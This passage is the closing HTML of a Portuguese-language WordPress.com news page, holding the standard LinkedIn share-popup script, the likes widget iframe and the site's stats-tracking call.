						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-linkedin' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-linkedin' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' );
						return false;
					}
				} );
			} )();
</script>
	<iframe src='https://widgets.wp.com/likes/master.html?ver=202111#ver=202111&amp;lang=pt-br' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> blogueiros gostam disto:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div>
	<script src='https://stats.wp.com/e-202111.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.5',blog:'12891280',post:'32711',tz:'-3',srv:'iguassunews.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '32711' ]);
</script>
</body>
</html>